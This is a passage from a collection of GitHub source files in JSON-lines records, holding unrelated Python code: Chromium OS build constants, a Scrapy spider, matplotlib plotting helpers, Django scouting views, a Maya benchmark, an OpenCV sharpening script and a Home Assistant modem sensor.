[SMOKE_SUITE_TEST_TYPE, SIMPLE_AU_TEST_TYPE,\n FULL_AU_TEST_TYPE]\n\nVERSION_FILE = os.path.join('src/third_party/chromiumos-overlay',\n 'chromeos/config/chromeos_version.sh')\nSDK_VERSION_FILE = os.path.join('src/third_party/chromiumos-overlay',\n 'chromeos/binhost/host/sdk_version.conf')\nSDK_GS_BUCKET = 'chromiumos-sdk'\n\nPUBLIC = 'public'\nPRIVATE = 'private'\n\nBOTH_OVERLAYS = 'both'\nPUBLIC_OVERLAYS = PUBLIC\nPRIVATE_OVERLAYS = PRIVATE\nVALID_OVERLAYS = [BOTH_OVERLAYS, PUBLIC_OVERLAYS, PRIVATE_OVERLAYS, None]\n\n# Common default logging settings for use with the logging module.\nLOGGER_FMT = '%(asctime)s: %(levelname)s: %(message)s'\nLOGGER_DATE_FMT = '%H:%M:%S'\n\n# Used by remote patch serialization/deserialzation.\nINTERNAL_PATCH_TAG = 'i'\nEXTERNAL_PATCH_TAG = 'e'\nPATCH_TAGS = (INTERNAL_PATCH_TAG, EXTERNAL_PATCH_TAG)\n\n# Default gerrit query used to find changes for CQ.\nDEFAULT_CQ_READY_QUERY = ('status:open AND CodeReview=+2 AND Verified=+1 '\n 'AND CommitQueue=+1 '\n 'AND NOT ( CodeReview=-2 OR Verified=-1 )')\n\n# Default filter rules for verifying that Gerrit returned results that matched\n# our query. This used for working around Gerrit bugs.\nDEFAULT_CQ_READY_FIELDS = {'SUBM': '0', 'CRVW': '2', 'VRIF': '1', 'COMR': '1'}\n\n# Some files need permissions set for several distinct groups. A google storage\n# acl (xml) file will be necessary in those cases. 
Make available well known\n# locations and standardize.\nKNOWN_ACL_FILES = {'slave': os.path.expanduser('~/slave_archive_acl')}\n\n# Environment variables that should be exposed to all children processes\n# invoked via cros_build_lib.RunCommand.\nENV_PASSTHRU = ('CROS_SUDO_KEEP_ALIVE', SHARED_CACHE_ENVVAR)\n\n# List of variables to proxy into the chroot from the host, and to\n# have sudo export if existent. Anytime this list is modified, a new\n# chroot_version_hooks.d upgrade script that symlinks to 45_rewrite_sudoers.d\n# should be created.\nCHROOT_ENVIRONMENT_WHITELIST = (\n 'CHROMEOS_OFFICIAL',\n 'CHROMEOS_VERSION_AUSERVER',\n 'CHROMEOS_VERSION_DEVSERVER',\n 'CHROMEOS_VERSION_TRACK',\n 'GCC_GITHASH',\n 'GIT_AUTHOR_EMAIL',\n 'GIT_AUTHOR_NAME',\n 'GIT_COMMITTER_EMAIL',\n 'GIT_COMMITTER_NAME',\n 'GIT_PROXY_COMMAND',\n 'GIT_SSH',\n 'RSYNC_PROXY',\n 'SSH_AGENT_PID',\n 'SSH_AUTH_SOCK',\n 'USE',\n 'all_proxy',\n 'ftp_proxy',\n 'http_proxy',\n 'https_proxy',\n 'no_proxy',\n)\n\n# Paths for Chrome LKGM which are relative to the Chromium base url.\nCHROME_LKGM_FILE = 'CHROMEOS_LKGM'\nPATH_TO_CHROME_LKGM = 'chromeos/%s' % CHROME_LKGM_FILE\nSVN_CHROME_LKGM = 'trunk/src/%s' % PATH_TO_CHROME_LKGM\n\n# Cache constants.\nCOMMON_CACHE = 'common'\n\n# Artifact constants.\ndef _SlashToUnderscore(string):\n return string.replace('/', '_')\n\nDEFAULT_ARCHIVE_BUCKET = 'gs://chromeos-image-archive'\nCHROME_SYSROOT_TAR = 'sysroot_%s.tar.xz' % _SlashToUnderscore(CHROME_CP)\nCHROME_ENV_TAR = 'environment_%s.tar.xz' % _SlashToUnderscore(CHROME_CP)\nCHROME_ENV_FILE = 'environment'\nBASE_IMAGE_NAME = 'chromiumos_base_image'\nBASE_IMAGE_TAR = '%s.tar.xz' % BASE_IMAGE_NAME\nBASE_IMAGE_BIN = '%s.bin' % BASE_IMAGE_NAME\nIMAGE_SCRIPTS_NAME = 'image_scripts'\nIMAGE_SCRIPTS_TAR = '%s.tar.xz' % IMAGE_SCRIPTS_NAME\nMETADATA_JSON = 'metadata.json'\n\n# Global configuration constants.\nCHROMITE_CONFIG_DIR = os.path.expanduser('~/.chromite')\nCHROME_SDK_BASHRC = os.path.join(CHROMITE_CONFIG_DIR, 'chrome_sdk.bashrc')\nSYNC_RETRIES = 2\nSLEEP_TIMEOUT = 30\n\n# Lab status url.\nLAB_STATUS_URL = 'http://chromiumos-lab.appspot.com/current?format=json'\n\n# URLs to the various waterfalls.\nBUILD_DASHBOARD = 'http://build.chromium.org/p/chromiumos'\nBUILD_INT_DASHBOARD = 'https://uberchromegw.corp.google.com/i/chromeos'\nTRYBOT_DASHBOARD = 'https://uberchromegw.corp.google.com/i/chromiumos.tryserver'\n","repo_name":"espadrine/opera","sub_path":"chromium/src/third_party/chromite/buildbot/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"8385226201","text":"import scrapy\nimport datetime\nimport time as timer\nfrom scrapy.spiders import Spider\nfrom scrapy.selector import Selector\nfrom datetime import date, time\nfrom rymbot.items import RymbotItem\n\nclass rymSpider(Spider):\n\tname = \"rym\"\n\tallowed_domains = [\"https://rateyourmusic.com\"]\n\turls = []\n\n\tdef __init__(self, daysoutcmmd=0, *args, **kwargs):\n\t\tself.daysout = daysoutcmmd\n\t\tnow = datetime.datetime.now() + datetime.timedelta(int(self.daysout))\n\t\tself.readyear = now.year\n\t\tself.readday = now.strftime('%d')\n\t\tself.readmonth = now.strftime('%m')\n\t\n\tdef start_requests(self):\n\t\tyears = []\n\t\tyear = 1960\n\t\twhile (year <=2018):\n\t\t\tyears.append(year)\n\t\t\tyear = year + 1\n\t\tpagecounter = range(1,5)\n\t\turl_pattern = \"https://rateyourmusic.com/charts/top/album/{year}/{page}\"\n\n\t\tfor yearage 
in years:\n\t\t\tfor page in pagecounter:\n\t\t\t\tself.urls.append(url_pattern.format(year=yearage,page=page))\n\n\t\tfor url in self.urls:\n\t\t\tyield scrapy.Request(url=url, callback=self.parse)\n\t\t\t\n\tdef parse(self, response):\n\t\tsel = Selector(response)\n\t\tsites = sel.xpath('.//table[@class=\"mbgen\"]//tr')\n\t\titems = []\n\t\tfor site in sites:\n\t\t\titem = RymbotItem()\n\t\t\titem['year'] = (response.request.url[-6:])[:4] #year of album\n\t\t\titem['ranking'] = site.xpath('.//td[1]/span/text()').extract() #rank\n\t\t\titem['artist'] = site.xpath('.//td[3]/div[1]/div[2]/span/a/text()').extract() #artist\n\t\t\titem['album'] = site.xpath('.//td[3]/div[1]/div[2]/div[1]/a/text()').extract() #album\n\t\t\titem['genre'] = site.xpath('.//td[3]/div[1]/div[2]/div[2]/span/a[1]/text()').extract() #genre\n\t\t\titem['rating'] = site.xpath('.//td[3]/div[2]/a[1]/b[1]/text()').extract() #rym rating\n\t\t\titem['ratings'] = site.xpath('.//td[3]/div[2]/a[1]/b[2]/text()').extract() #num of ratings\n\t\t\titem['reviews'] = site.xpath('.//td[3]/div[2]/a[1]/b[3]/text()').extract() #num of reviews\n\t\t\titems.append(item)\n\t\treturn items","repo_name":"retropean/rym-bot","sub_path":"rymbot/spiders/rate_spider.py","file_name":"rate_spider.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74568818385","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nThis module contains functions for producing scatter plots with markers\nthat indicate which binary flags are set on each data point and accompanying\nlegends.\n\nThe output of the main scatterflags() function can be used as the input to\nthe flagbar() function to produce a colorbar.\n\nExample usage:\n import scatterflags as sf\n import numpy as np\n import matplotlib.pyplot as plt\n npts=50\n x = np.arange(npts)\n y = np.random.randn(npts)\n f,(ax0,ax1) = plt.subplots(2,1,figsize=(6,5),gridspec_kw={'height_ratios':[4,1]})\n kwargs = sf.scatterflags(x,y,np.round(np.random.randint(1,64,npts)),ax=ax0)\n ax0.scatter(x,y,c='0',s=1,zorder=10,marker='*')\n ax0.set_xlabel('x')\n ax0.set_ylabel('y')\n sf.flagbar(cax=ax1,flaglabels=['flag'+str(i) for i in range(6)],barlabel='flags',**kwargs)\n plt.tight_layout()\n plt.show()\n\n@author: bell@mps.mpg.de\n\"\"\"\n\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport seaborn as sns\n\n\ndef scatterflags(x,y,flags,r=5.,dr=5.,ax=None,nflags=None,colors=None,cmap=None,\n minzorder=1,**kwargs):\n \"\"\"Plot scatter markers that indicate associated set flags.\n \n Args:\n x, y: input data\n flags: per-point flags (bitwise binary strings or base10 equiv ints)\n r: radius (pixels) of smallest marker (default: 5)\n dr: radius increase per flag (default: 5)\n ax: axis for scatterplot (optional)\n nflags: number of possible flags (can be inferred from flags)\n colors: colors to plot for each flag\n cmap: colormap to use for automaticly picking colors from (no jet!)\n minzorder: zorder of last flag (each earlier flag has one higher zorder)\n **kwargs: other keywords to pass to scatter (e.g. 
marker)\n    \n    Returns:\n        kwargs for flagbar() function (produces colorbar legend) \n    \"\"\"\n    #Where is this plot going?\n    if ax is None:\n        ax = plt.gca()\n    \n    #Convert integer flags to bitwise flag strings (leave string flags as-is)\n    flags = [bin(num)[2:] if isinstance(num, (int, long, np.integer)) else num for num in flags]\n    \n    #Set number of flags if not explicit\n    if nflags is None:\n        nflags = max([len(flag) for flag in flags])\n    \n    #Pad string flags to (at least) nflags\n    flags = [flag.zfill(nflags) for flag in flags]\n    \n    #Each flag needs an associated color\n    #These may have been explicitly included\n    ncolors = nflags\n    #If fewer colors were included, cycle through\n    if colors is not None:\n        colors = [colors[i % len(colors)] for i in range(nflags)]\n    else: #colors not specified\n        colors = sns.color_palette(cmap,nflags)\n    \n    #Define marker sizes\n    ms = (r+dr*np.arange(nflags))**2.\n    \n    #Scatter plot for each flag\n    #Smallest to largest (highest zorder to lowest = minzorder)\n    for i in range(nflags):\n        flagged = np.where([int(chars[-i-1]) for chars in flags])\n        ax.scatter(x[flagged],y[flagged],s=ms[i],c=mpl.colors.to_hex(colors[i]),\n                   lw=0,zorder=minzorder+nflags-i,**kwargs)\n    \n    #Return dict of kwargs for formatting the colorbar\n    return dict({'r':r,'dr':dr,'nflags':nflags,'colors':colors},**kwargs)\n\n\ndef flagbar(cax=None,nflags=None,r=5.,dr=5.,colors=None,cmap=None,\n            flaglabels=None,barlabel=None,**kwargs):\n    \"\"\"Plot colorbar with scatter marker shapes/sizes\n    \n    Args:\n        cax: target axis for colorbar (short and wide ideally)\n        nflags: number of different flags\n        r: radius (pixels) of smallest marker (default: 5)\n        dr: radius increase per flag (default: 5)\n        colors: colors to plot for each flag\n        cmap: colormap to use for automatically picking colors from (no jet!)\n        flaglabels: str labels associated with each flag\n        barlabel: overall label for colorbar\n        **kwargs: other keywords to pass to scatter (e.g. marker)\n    \n    Note: besides the cax, the returned dicts from scatterflags() will set\n    the rest of these args appropriately. 
Call as `flagbar(cax,**kwargs)`\n where `kwargs = scatterflags(...)`\n \"\"\"\n #Determine number of flags to represent\n if nflags is None:\n if flaglabels is not None:\n nflags = len(flaglabels)\n elif colors is not None:\n nflags = len(colors)\n \n #Throw and error if number of flags not defined\n try:\n _ = int(nflags)\n except TypeError:\n raise ValueError(\"Must specify number of flags to flagbar, explicitly or implicitly.\")\n \n #Each flag needs an associated color\n #These may have been explicitly included\n ncolors = nflags\n #If fewer colors were included, cycle through\n if colors is not None:\n colors = [colors[i % len(colors)] for i in range(nflags)]\n else: #colors not specified\n colors = sns.color_palette(cmap,nflags)\n \n #Define marker sizes\n ms = (r+dr*np.arange(nflags))**2.\n \n #Length of flaglabels must be nflags\n if flaglabels is None:\n flaglabels = []\n nflaglabels = len(flaglabels)\n if nflaglabels < nflags:\n flaglabels += [\"\"]*(nflags-nflaglabels)\n else:\n flaglabels = flaglabels[:nflags]\n \n #Where to plot\n if cax is None: #Probably better to specify\n cax = plt.gca()\n \n #Plot colorbar\n colorbounds = np.linspace(0,1,nflags+1)\n colorcenters = (colorbounds[1:]+colorbounds[:-1])/2.\n cb = mpl.colorbar.ColorbarBase(cax,cmap=mpl.colors.ListedColormap(colors),\n ticks=colorcenters,spacing='proportional',\n orientation='horizontal')\n cb.ax.set_xticklabels(flaglabels,rotation=45) #label flags under colorbar\n if barlabel is not None: #label y axis side\n cax.set_ylabel(barlabel)\n cax.scatter(colorcenters,[.5]*nflags,edgecolor='0',s=ms,c='none',**kwargs)\n","repo_name":"keatonb/scatterflags","sub_path":"scatterflags.py","file_name":"scatterflags.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39566328838","text":"import csv\nimport os\nfrom sqlalchemy.exc import SQLAlchemyError as e\nfrom app import db\nfrom models import Strain\n\ndirec = os.path.dirname(os.path.abspath(__file__))\n\n\ndef create_strain_instance(row):\n print(row['terpenes'])\n strain = Strain(\n name=row['name'],\n terpenes=row['terpenes'],\n )\n print(f\"...adding Strain #{strain.name}, Strain ID: {strain.id}\")\n\n\ndef seed_db():\n try:\n print(\"Seeding database, this will take several minutes...\")\n with open('strains.csv') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n create_strain_instance(row)\n print(\"Database seeded!\")\n except e:\n print(\"Database error. 
Update aborted.\")\n db.session.rollback()\n\n\nseed_db()","repo_name":"areeves9/chemovar","sub_path":"seed_db.py","file_name":"seed_db.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27007641448","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.utils.text import slugify\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import Robot, Pit, Match\nfrom .forms import UploadFileForm, RobotForm, PitForm, MatchForm\n\n# Create your views here.\n# urlpatterns = [\n# path('add/match/', views.add_match),\n# path('add/pit/', views.add_pit),\n# path('add/robots/', views.add_robots),\n# path('list/', views.list),\n# path('robot//', views.robot),\n# ]\n#\n\n\n@csrf_exempt\ndef simple_scout(request):\n return render(request, 'scout/simple_scout.html', {})\n\n\n@csrf_exempt\ndef add_match(request):\n if request.method == 'POST':\n form = MatchForm(request.POST)\n if form.is_valid():\n form.save()\n form = MatchForm()\n else:\n form = MatchForm()\n return render(request, 'scout/form.html', {'form': form})\n\n\n@csrf_exempt\ndef add_pit(request):\n if request.method == 'POST':\n form = PitForm(request.POST)\n if form.is_valid():\n form.save()\n form = PitForm()\n else:\n form = PitForm()\n return render(request, 'scout/form.html', {'form': form})\n\n\n@csrf_exempt\ndef add_robots(request):\n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n for chunk in request.FILES['file'].chunks():\n arr = str(chunk).split(',')\n for i in range(0, len(arr), 2):\n # lazy hack\n if arr[i][0] == 'b':\n arr[i] = arr[i][2:]\n robot = Robot(number=int(arr[i]), name=arr[i+1], slug=slugify(arr[i+1]))\n robot.save()\n print(robot)\n\n return JsonResponse({'status': 'ok'})\n else:\n form = UploadFileForm()\n return render(request, 'scout/form.html', {'form': form})\n\n\n@csrf_exempt\ndef add_external(request):\n if request.method == 'POST':\n scout = json.loads(request.POST['scout'])\n for data in scout:\n name = data['name']\n value = data['value']\n if name == 'scout_type':\n if value == 'match':\n Match.create_match(scout)\n if value == 'pit':\n Pit.create_pit(scout)\n return JsonResponse({'status': 'ok'})\n return JsonResponse({'status': 'error'})\n\n\ndef list_robots(request):\n robots = Robot.objects.filter(match_data__isnull=False).distinct()\n return render(request, 'scout/list.html', {'robots': robots})\n# return render(request, 'scouter/birdseyeview.html', {'my_surveys': my_surveys})\n\n\ndef list_saturday_robots(request):\n robots = Robot.objects.filter(match_data__saturday=True).distinct()\n return render(request, 'scout/list.html', {'robots': robots})\n\n\ndef tally_to_count(request):\n matches = Match.objects.all()\n for match in matches:\n if str(match.scale_cubes)[0] == '1':\n match.scale_cubes = len(str(match.scale_cubes))\n if str(match.vault_cubes)[0] == '1':\n match.vault_cubes = len(str(match.vault_cubes))\n if str(match.own_switch_cubes)[0] == '1':\n match.own_switch_cubes = len(str(match.own_switch_cubes))\n if str(match.other_switch_cubes)[0] == '1':\n match.other_switch_cubes = len(str(match.other_switch_cubes))\n match.save()\n return 
JsonResponse({\"Status\":\"Done!\"})\n\n\n","repo_name":"mknapper1/AwesomeScout","sub_path":"scout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36371337915","text":"# -*- coding: utf-8 -*-\n\nfrom cal9 import config\nfrom cal9 import ical\nfrom cal9.util import DEBUG\n\nfrom contextlib import contextmanager\n\nimport simplejson as json\nimport icalendar\nimport time\nimport os\n\nFOLDER = config.config.calendars.folder\n\nclass Collection(ical.Collection):\n @property\n def _path(self):\n \"\"\" Path on the computer \"\"\"\n\n # Remove first / and last /\n path = self.path.strip('/')\n\n return os.path.join(FOLDER, path.replace('/', os.sep))\n\n @property\n def _props_path(self):\n \"\"\" Properties path on the computer \"\"\"\n return '{0}.props'.format(self._path)\n\n def _makedirs(self):\n if not os.path.exists(os.path.dirname(self._path)):\n os.makedirs(os.path.dirname(self._path))\n\n @property\n def last_modified(self):\n # Create calendar if needed\n if not os.path.exists(self._path):\n self.save()\n\n modification_time = time.gmtime(os.path.getmtime(self._path))\n return time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", modification_time)\n\n @property\n @contextmanager\n def props(self):\n properties = {}\n\n # Read properties\n\n if os.path.exists(self._props_path):\n with open(self._props_path, 'r') as f:\n properties.update(json.load(f))\n\n yield properties\n\n # Save properties\n\n self._makedirs()\n with open(self._props_path, 'w') as f:\n json.dump(properties, f)\n\n def get(self):\n ical = None\n\n # If path exists\n if os.path.exists(self._path):\n # Parse iCalendar object\n try:\n with open(self._path) as f:\n ical = icalendar.Calendar.from_ical(f.read())\n\n except IOError:\n ical = None\n\n if not ical:\n ical = icalendar.Calendar()\n\n return ical\n\n def write(self):\n self._makedirs()\n\n content = self.text\n\n with open(self._path, 'w') as f:\n f.write(content)\n\n def delete(self):\n os.remove(self._path)\n\n @classmethod\n def is_calendar(cls, path):\n abs_path = os.path.join(FOLDER, path.replace('/', os.sep))\n return os.path.isdir(abs_path)\n\n @classmethod\n def is_item(cls, path):\n abs_path = os.path.join(FOLDER, path.replace('/', os.sep))\n return os.path.isfile(abs_path)\n\nical.Collection = Collection\n","repo_name":"linkdd/9cal","sub_path":"cal9/backends/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6963456149","text":"# -*- coding: utf-8 -*-\n\"\"\"\ncreate a sphere with random offset for performance test.\ntest in 2020 mayapy env.\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\n__author__ = \"timmyliang\"\n__email__ = \"820472580@qq.com\"\n__date__ = \"2022-07-20 13:09:04\"\n\n\nimport random\nimport time\nimport os\nfrom maya import cmds\nfrom maya import standalone\n\n\ndef log_time(func):\n def decorator(*args, **kwargs):\n curr = time.time()\n res = func(*args, **kwargs)\n print(\"[{0}] elapsed time: {1}\".format(func.__name__, time.time() - curr))\n return res\n return decorator\n\n\n@log_time\ndef openmaya_1(sx=50, sy=50):\n from maya import OpenMaya\n\n sphere = cmds.polySphere(sx=sx, sy=sy)[0]\n selection_list = OpenMaya.MSelectionList()\n 
OpenMaya.MGlobal.getActiveSelectionList(selection_list)\n sphere_dag_path = OpenMaya.MDagPath()\n selection_list.getDagPath(0, sphere_dag_path)\n itr = OpenMaya.MItMeshVertex(sphere_dag_path)\n\n while not itr.isDone():\n pt = itr.position()\n rand = (random.random() - 0.5) / 20\n itr.setPosition(pt + OpenMaya.MVector(rand, rand, rand))\n itr.next()\n\n return sphere\n\n\n@log_time\ndef openmaya_2(sx=50, sy=50):\n from maya.api import OpenMaya\n\n sphere = cmds.polySphere(sx=sx, sy=sy)[0]\n selection_list = OpenMaya.MGlobal.getActiveSelectionList()\n sphere_dag_path = selection_list.getDagPath(0)\n itr = OpenMaya.MItMeshVertex(sphere_dag_path)\n\n while not itr.isDone():\n pt = itr.position()\n rand = (random.random() - 0.5) / 20\n itr.setPosition(pt + OpenMaya.MVector(rand, rand, rand))\n itr.next()\n return sphere\n\n\n@log_time\ndef maya_cmds(sx=50, sy=50):\n from maya import cmds\n\n sphere = cmds.polySphere(sx=sx, sy=sy)[0]\n for vtx in cmds.ls(\"{0}.vtx[*]\".format(sphere), fl=True):\n pt = cmds.pointPosition(vtx)\n rand = (random.random() - 0.5) / 20\n cmds.xform(vtx, t=(pt[0] + rand, pt[1] + rand, pt[2] + rand))\n return sphere\n\n\n@log_time\ndef run_cpp(sx=50, sy=50):\n return cmds.createNoiseSphere(sx=sx, sy=sy)\n\n\ndef load_plugin():\n if cmds.pluginInfo(\"noiseSphere\", q=1, l=1):\n cmds.unloadPlugin(\"noiseSphere\")\n\n repo = (lambda f: f(f, os.path.dirname(__file__)))(\n lambda f, p: p\n if [d for d in os.listdir(p) if d == \".git\"]\n else f(f, os.path.dirname(p))\n if os.path.dirname(p) != p\n else None\n )\n folder = \"maya{0}\".format(cmds.about(q=1, v=1))\n mll_path = os.path.join(repo, \"release\", folder, \"noiseSphere.mll\")\n cmds.loadPlugin(mll_path)\n\n\nif __name__ == \"__main__\":\n standalone.initialize()\n sx = 150\n sy = 150\n load_plugin()\n\n maya_cmds(sx, sy)\n openmaya_1(sx, sy)\n openmaya_2(sx, sy)\n run_cpp(sx, sy)\n \n standalone.uninitialize()\n","repo_name":"FXTD-ODYSSEY/Maya-PerfomanceTest","sub_path":"scripts/test_api_performance.py","file_name":"test_api_performance.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1116394137","text":"# data = list(range(1,21))\n# for i in range(10):\n# where = list(map(int,input().split()))\n# if where[0] == where[1]:\n# continue\n# bande = data[where[0]-1:where[1]]\n# bande.reverse()\n# del data[where[0]-1:where[1]]\n \n# t = 0\n# for j in range(where[0]-1,where[1]):\n# data.insert(j,bande[t])\n# t = t + 1\n# print(*data)\n\n\nA = list(range(1,21))\nfor _ in range(10):\n a,b = map(lambda x:int(x)-1,input().split())\n A[a:b+1] = A[a:b+1][::-1]\nprint(*A)","repo_name":"asdfqrt/barkingdog","sub_path":"02강 기초코드작성요령2/카드 역배치.py","file_name":"카드 역배치.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6939843471","text":"import os\nfrom twilio.rest import Client\n\naccount_sid = os.environ['TWILIO_ACCOUNT_SID']\nauth_token = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\nexecution = client.studio \\\n .flows('FW8935b8a1950c90180a2e0532905c9177') \\\n .executions \\\n .create(\n to='+19082477262',\n from_='+19084607058',\n parameters={'name': 'Jefferson Elementary School'}\n 
)\n\nprint(execution.sid)\n\n","repo_name":"ErikaKettleson/studio-test","sub_path":"blackboard.py","file_name":"blackboard.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"42799843342","text":"vowel = ('A', 'E', 'I', 'O', 'U', 'a', 'e', 'i', 'o', 'u')\n\nwhile True:\n    cnt = 0\n    string = input()\n    if string == '#':\n        break\n    for i in string:\n        if i in vowel:\n            cnt += 1\n    print(cnt)","repo_name":"LeeJeongWook/Programming","sub_path":"Online_Judge/BaekJoon/0000-4999/[1264]모음의 개수.py","file_name":"[1264]모음의 개수.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"41339307845","text":"import random\nimport re\nfrom typing import List\n\nfrom telebot.types import Message\n\nfrom ashlee import emoji, utils\nfrom ashlee.action import Action\n\n\nclass Choice(Action):\n\n    r_or = re.compile(r\"\\s+(или|or)\\s+\", flags=re.IGNORECASE)\n\n    def get_description(self) -> str:\n        return \"выбрать вариант\"\n\n    def get_name(self) -> str:\n        return emoji.INFO + \" Выбрать вариант\"\n\n    def get_cmds(self) -> List[str]:\n        return [\"choice\"]\n\n    def get_keywords(self) -> List[str]:\n        return [\" или \"]\n\n    @Action.save_data\n    @Action.send_typing\n    def call(self, message: Message):\n        if message.text.startswith(\"/\"):\n            keyword = utils.get_keyword(message)\n        else:\n            keyword = utils.r_ashley.sub(\"\", message.text).strip()\n        if keyword[-1::] == \"?\":\n            keyword = keyword[:-1:]\n        if not keyword:\n            self.bot.reply_to(\n                message,\n                \"Пример использования \\n`/choice быть или не быть?`\",\n                parse_mode=\"markdown\",\n            )\n            return\n        variants = []\n        for var in self.r_or.split(keyword):\n            if var.strip().lower() == \"или\":\n                continue\n            elif \",\" in var:\n                variants.append(var.split(\",\")[-1].strip())\n            else:\n                variants.append(var)\n        sel = random.choice(variants)\n        self.bot.reply_to(message, sel)\n","repo_name":"Tairesh/ashley","sub_path":"ashlee/actions/choice.py","file_name":"choice.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} {"seq_id":"11250065445","text":"import cv2\nimport numpy as np\n\n# Load the images \nlenna = cv2.imread('lenna.jpg', cv2.IMREAD_COLOR)\nf_16 = cv2.imread('f_16.jpg', cv2.IMREAD_COLOR)\n\n# Define the size of the Gaussian filter\nk_size = (7, 7)\n\n# Choose the enhancement factor (K) for high-boost filtering \n# I used 1,1.5,2 for first set of k values\n#set 3,2,3 for k values\n# set 5,4,5 for k values\n# set 7,4,5 for k values\nK_values = [5, 4, 5]  # Experiment with different K values\n\nfor K in K_values:\n    # Apply Gaussian blur to the images\n    lenna_smoothed = cv2.GaussianBlur(lenna, k_size, 0)\n    f_16_smoothed = cv2.GaussianBlur(f_16, k_size, 0)\n\n    # Calculate the difference between the original and smoothed images\n    # (work in float: uint8 arithmetic would wrap around on negative values)\n    lenna_difference = lenna.astype(np.float32) - lenna_smoothed.astype(np.float32)\n    f_16_difference = f_16.astype(np.float32) - f_16_smoothed.astype(np.float32)\n\n    # Multiply the difference by the enhancement factor (K)\n    lenna_enhanced = lenna.astype(np.float32) + K * lenna_difference\n    f_16_enhanced = f_16.astype(np.float32) + K * f_16_difference\n\n    # Ensure pixel values are within the valid range [0, 255]\n    lenna_enhanced = np.clip(lenna_enhanced, 0, 255).astype(np.uint8)\n    f_16_enhanced = np.clip(f_16_enhanced, 0, 255).astype(np.uint8)\n\n    # if both images do not display at the same time comment one out and repeat\n    # Display or save the enhanced images\n    cv2.imshow(f'Lenna Enhanced 
(K={K})', lenna_enhanced)\n cv2.imshow(f'F-16 Enhanced (K={K})', f_16_enhanced)\n cv2.waitKey(0)\n\n# Close all open windows\ncv2.destroyAllWindows()\n\n","repo_name":"cabmeron/CS474_Prog1","sub_path":"High_Boosting.py","file_name":"High_Boosting.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26670415122","text":"import numpy as np\nimport re\nfrom utils.read_doc_file import read_docs\nfrom utils.read_query_file import read_queries\nquery_list = read_queries()\n\ndocuments = list(read_docs().values())\n\n# Build a vocabulary of unique words in the documents\nvocabulary = set()\n\npattern = r'[.]'\nfor num in range(len(documents)):\n documents[num] = re.sub(pattern, '', documents[num])\n\nfor document in documents:\n vocabulary.update(document.lower().split())\n\n# Build the boolean matrix\nmatrix = np.zeros((len(documents), len(vocabulary)), dtype=int)\nfor i, document in enumerate(documents):\n words = set(document.lower().split())\n for j, word in enumerate(vocabulary):\n if word in words:\n matrix[i, j] = 1 \n\nfor query in query_list:\n query_words = query.lower().split()\n query_vector = np.array([1 if word in query_words else 0 for word in vocabulary])\n matching_documents = np.nonzero(np.all(matrix[:, query_vector == 1], axis=1))[0]\n print(matching_documents)\n","repo_name":"lttrung2001/chuyen-de-cong-nghe-phan-mem","sub_path":"BT1/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12553208965","text":"\"\"\"A sensor for incoming calls using a USB modem that supports caller ID.\"\"\"\nfrom __future__ import annotations\n\nfrom phone_modem import DEFAULT_PORT, PhoneModem\nimport voluptuous as vol\n\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity\nfrom homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry\nfrom homeassistant.const import (\n CONF_DEVICE,\n CONF_NAME,\n EVENT_HOMEASSISTANT_STOP,\n STATE_IDLE,\n)\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.helpers import config_validation as cv, entity_platform\nfrom homeassistant.helpers.typing import DiscoveryInfoType\n\nfrom .const import CID, DATA_KEY_API, DEFAULT_NAME, DOMAIN, ICON, SERVICE_REJECT_CALL\n\n# Deprecated in Home Assistant 2021.10\nPLATFORM_SCHEMA = cv.deprecated(\n vol.All(\n PLATFORM_SCHEMA.extend(\n {\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_DEVICE, default=DEFAULT_PORT): cv.string,\n }\n )\n )\n)\n\n\nasync def async_setup_platform(\n hass: HomeAssistant,\n config: ConfigEntry,\n async_add_entities: 